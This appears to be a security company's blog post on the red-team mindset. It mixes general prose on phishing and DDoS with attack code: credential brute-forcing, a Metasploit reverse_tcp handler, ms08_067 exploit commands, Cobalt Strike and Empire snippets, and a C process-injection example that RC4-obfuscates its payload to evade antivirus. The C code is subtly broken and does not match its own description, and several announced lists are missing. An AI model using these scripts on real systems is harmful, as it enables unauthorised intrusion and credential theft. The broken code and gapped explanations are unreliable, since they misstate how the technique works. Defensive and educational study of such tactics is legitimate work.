One of the most crucial aspects of defense is understanding the adversary. Cybercriminals operate with a distinct mindset, employing a wide array of tactics, techniques, and procedures (TTPs) to achieve their malicious objectives. Curiosity is the driving force behind a red teamer's relentless pursuit of knowledge and understanding. They possess an insatiable desire to explore, question, and experiment with new ideas and technologies. This innate curiosity fuels their creativity, enabling them to devise innovative solutions to complex cybersecurity problems. Red teamers approach every challenge as an opportunity to push the boundaries of conventional thinking, constantly seeking new ways to uncover vulnerabilities and bypass security measures. Whether it's devising novel attack vectors, crafting sophisticated social engineering schemes, or exploring emerging technologies, red teamers thrive on the thrill of exploration and discovery. In this blog post, we'll delve into the mindset of read teamers and explore their TTPs to better equip ourselves in the ongoing battle against cyber threats.
While red teaming exercises are conducted to assess and improve the security posture of organizations. It is essential to ensure that such activities are performed within legal and ethical boundaries, with appropriate authorization and consent from the organization being tested.
Adversarial Thinking: Red teamers adopt an adversarial mindset, thinking like attackers to identify vulnerabilities and exploit them. They anticipate the tactics, techniques, and procedures (TTPs) adversaries might employ and use this insight to craft realistic attack scenarios.
Creativity and Ingenuity: Successful attacks often require creativity and ingenuity. Red teamers leverage their creativity to devise novel attack vectors and circumvent security controls. They think outside the box, exploring unconventional methods to achieve their objectives.
Patience and Persistence: Attackers exhibit patience and persistence in their pursuit of targets. Similarly, red teamers adopt a patient approach, meticulously planning and executing their attacks over time. They persistently probe for weaknesses, adapting their tactics as necessary to overcome obstacles.
Social Engineering Skills: Social engineering plays a significant role in many attacks, exploiting human psychology to manipulate individuals into divulging sensitive information or performing actions that aid the attacker. Red teamers hone their social engineering skills to effectively influence and manipulate targets.
Cybercriminals employ a diverse range of tactics, techniques, and procedures (TTPs) to achieve their objectives. Some common TTPs include:
The Red Teamer must keep up to date on these tactics and utilize their inherent creativity in crafting simulations of these procedures. Each of these tactics is seldom executed independently of the other rather each relies on the next to gain initial or further access. An attack could begin with a spear phishing campaign that utilizes malware for credential harvesting. Once credentials have been harvested a RAT could be deployed through an exploit found with initial access.
Red Teamers utilize scripts to keep the attack server history clear, and to keep track of each method used. There are an ever-growing number of tools used during engagements, but there are a few which are fairly universal. Below are examples of these methods and tools written in Python and C.
Enumeration and Information Gathering in Python
Below is a script that uses NMAP, an open-source tool for network exploration and security auditing. This tool is universally used to discover open ports and potentially vulnerable services:
# Example script for network enumeration using Nmap
import nmap
nm = nmap.PortScanner()
nm.scan('192.168.1.0/24', arguments='-p 22,80,443 -sV')
print(nm.all_hosts())
Exploitation and Post-Exploitation in Python
In the example below a web request to a url login is sent as a POST request. This script can be used for testing credentials harvested, brute forcing (a tactic using a list of words to guess the password), and modified for sql injection:
# Example script for exploiting a vulnerable web server
import requests
url = 'http://vulnerable-server.com/login'
payload = {'username': 'admin', 'password': 'password'}
response = requests.post(url, data=payload)
print(response.text)
Persistence and Lateral Movement in Python
This script below creates a meterpreter handler to establish a listener that will listen for a connection from a backdoor or payload. The session created can also be used to connect to adjacent networks laterally moving between VLANS or network segments:
# Example script for creating a backdoor using Metasploit
from metasploit.msfrpc import MsfRpcClient
client = MsfRpcClient('password')
exploit = client.modules.use('exploit', 'multi/handler')
exploit.execute(payload='windows/meterpreter/reverse_tcp')
Encrypted Malware Example in C
In the example malware creates a new process in a suspended state, replaces its code and memory space with a malicious payload such as a prompt or C2 shellcode, and then resumes the execution of the process. This makes it appear as if the legitimate process is running normally while executing malicious code. RC4 encryption is used to obfuscate the code from static analysis such as an EDR/AV:
#include <windows.h>
#include <stdio.h>
#include <iostream>
#include <string>
// RC4 key scheduling algorithm
void ksa(unsigned char S[256], const unsigned char* key, size_t key_length) {
for (int i = 0; i < 256; ++i) {
S[i] = i;
}
int j = 0;
for (int i = 0; i < 256; ++i) {
j = (j + S[i] + key[i % key_length]) % 256;
std::swap(S[i], S[j]);
}
}
// RC4 pseudo-random generation algorithm
void prga(const unsigned char S[256], unsigned char* data, size_t data_length) {
int i = 0;
int j = 0;
for (size_t k = 0; k < data_length; ++k) {
i = (i + 1) % 256;
j = (j + S[i]) % 256;
std::swap(S[i], S[j]);
int t = (S[i] + S[j]) % 256;
data[k] ^= S[t];
}
}
// Function to encrypt data using RC4
std::string rc4_encrypt(const std::string& plaintext, const std::string& key) {
unsigned char S[256];
ksa(S, reinterpret_cast<const unsigned char*>(key.c_str()), key.length());
std::string ciphertext = plaintext;
prga(S, reinterpret_cast<unsigned char*>(&ciphertext[0]), ciphertext.length());
return ciphertext;
}
int main() {
// Path to the legitimate process to be hollowed
LPCSTR targetProcessPath = "C:\\Windows\\System32\\notepad.exe";
// Malicious payload to be injected (encrypted using RC4)
std::string encryptedPayload = rc4_encrypt("malicious_payload.dll", "SecretKey");
// Create a suspended instance of the target process
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi;
CreateProcess(targetProcessPath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
// Get the base address of the target process
LPVOID targetProcessBaseAddress = VirtualAllocEx(pi.hProcess, NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Write the encrypted payload into the target process
WriteProcessMemory(pi.hProcess, targetProcessBaseAddress, encryptedPayload.c_str(), encryptedPayload.length() + 1, NULL);
// Get the address of the LoadLibrary function from kernel32.dll
LPTHREAD_START_ROUTINE loadLibraryAddr = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
// Create a remote thread in the target process to execute the malicious payload
HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, 0, loadLibraryAddr, targetProcessBaseAddress, 0, NULL);
// Wait for the remote thread to finish execution
WaitForSingleObject(hThread, INFINITE);
// Resume the execution of the target process
ResumeThread(pi.hThread);
// Close handles
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return 0;
}
Phishing is a deceptive technique used by hackers to trick individuals into divulging sensitive information, such as login credentials, personal details, or financial data. Red team hackers often employ sophisticated phishing campaigns to infiltrate organizations and gain unauthorized access to their systems.
Crafting Convincing Emails
A red team hacker begins by meticulously crafting phishing emails designed to mimic legitimate communication. They research the organization's branding, communication style, and typical email formats to make the emails appear authentic. These emails often impersonate trusted entities, such as colleagues, IT support staff or well-known companies.
Exploiting Psychological Triggers
Phishing emails exploit psychological triggers to manipulate recipients into taking action. Red team hackers leverage urgency, curiosity, fear, or greed to compel recipients to click on malicious links, download attachments, or provide sensitive information. For example, an email might claim that urgent action is required to prevent an account suspension or offer a tempting reward for participating in a survey.
Creating Convincing Landing Pages
Once recipients click on a phishing link, they are directed to a spoofed website or landing page designed to mimic a legitimate login portal, survey form, or download page. These fake pages closely resemble their authentic counterparts, making it difficult for users to discern the difference. Red team hackers often use tools like Social-Engineer Toolkit (SET) or custom-built web pages to create these deceptive landing pages.
Harvesting Credentials
As unsuspecting users input their login credentials or other sensitive information into the fake forms, red team hackers capture this data for malicious purposes. They may store the stolen credentials in plaintext or encrypted form for later use in further attacks, such as unauthorized access to corporate accounts or launching internal phishing campaigns.
Evading Detection
To evade detection by security systems and email filters, red team hackers constantly evolve their phishing tactics. They may employ techniques like domain spoofing, obfuscation of malicious URLs, and leveraging compromised email accounts to bypass traditional security measures. Additionally, they monitor and adapt to changes in the organization's security posture to maintain their effectiveness.
Mitigation Strategies
Organizations can mitigate the risk of phishing attacks by implementing robust security awareness training programs, deploying email filtering solutions, and adopting multi-factor authentication (MFA) to protect against stolen credentials. Regular phishing simulations conducted by red teams can also help employees recognize and report suspicious emails, bolstering the organization's overall resilience to phishing attacks.
Distributed Denial of Service (DDoS) attacks represent a significant threat to the stability and security of online services, businesses, and even governments. By inundating targeted systems with a flood of traffic, DDoS attacks render them inaccessible to legitimate users, disrupting operations and potentially causing financial losses. A DDoS attack is a tactic usually used to disrupt services to reveal weakness in defense team responses and can be used to mask malicious activities.
Tools, scripts, and techniques used in DDoS attacks are varied and constantly evolving as attackers seek new methods to overwhelm and disrupt target systems. Here are some commonly used tools, scripts, and techniques:
Mitigation against DDoS attacks often involves a combination of network-level defenses, such as traffic filtering and rate limiting, and application-layer protections, such as web application firewalls (WAFs); additionally, proactive monitoring, threat intelligence sharing, and incident response planning are essential for effectively mitigating the impact of DDoS attacks and maintaining operational resilience.
Here is a sample script in Python that sends HTTP POST requests to the target URL, attempting different combinations of usernames and passwords. If the response from the server indicates a successful login (such as the absence of a "Login failed" message), the script prints the valid credentials.
import requests
def harvest_credentials(url, username_field, password_field, user_list, password_list):
for username in user_list:
for password in password_list:
payload = {username_field: username, password_field: password}
response = requests.post(url, data=payload)
if "Login failed" not in response.text:
print("Valid credentials found: {}:{}".format(username, password))
# Optionally, you can save the valid credentials to a file or database
break
# Example usage:
if __name__ == "__main__":
target_url = "https://example.com/login"
username_field_name = "username"
password_field_name = "password"
usernames = ["admin", "user", "test"]
passwords = ["password", "123456", "admin123"]
harvest_credentials(target_url, username_field_name, password_field_name, usernames, passwords)
RATs are essential for red teamers as they provide remote control over compromised systems, enabling lateral movement, data exfiltration, and further exploitation. Here are some commonly used RATs:
Metasploit
Metasploit is a powerful framework that offers a range of exploits, payloads, and auxiliary modules for penetration testing and red teaming. Below is a sample script using Metasploit to exploit a vulnerability and gain remote access
use exploit/windows/smb/ms08_067_netapi
set RHOSTS target_ip
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
Cobalt Strike
Cobalt Strike is a commercial penetration testing tool that includes features for post-exploitation, command and control, and collaboration. The following script demonstrates how to use Cobalt Strike to establish a foothold on a target system
./teamserver IP_ADDRESS my_password
Empire
Empire is a post-exploitation framework that provides a variety of modules for command execution, privilege escalation, and lateral movement. Here's an example of using Empire to execute commands on a compromised host
usemodule execution
set listener http
execute -f calc.exe
"The Unorthodox Approach to Red Teaming" by Will Burgess: Published in the Red Team Journal, this article explores unconventional tactics and strategies employed by red teams, emphasizing the need for adaptability and innovation. (The journal is now defunct)
"The Art of Red Teaming" by Jayson E. Street: In this article published in Infosec Island, Jayson Street discusses the mindset and methodologies of red teamers, drawing from his extensive experience in offensive security operations.
"The Red Team Field Manual" by Ben Clark: A reference guide developed from operator field notes inspired by years of Red Team missions.
The mindset of a red teamer is characterized by curiosity, creativity, persistence, ethical integrity, analytical acumen, and collaborative spirit. These individuals play a vital role in safeguarding organizations against cyber threats by emulating the tactics of malicious actors and uncovering vulnerabilities before they can be exploited. Through real-world scenarios, we have witnessed the transformative impact of SYNOPS services in identifying and mitigating cybersecurity risks. As the cybersecurity landscape continues to evolve, the role of red teamers will remain indispensable in defending against emerging threats and ensuring the resilience of critical infrastructure. Stay tuned for our next article where we look at real-world red team scenarios.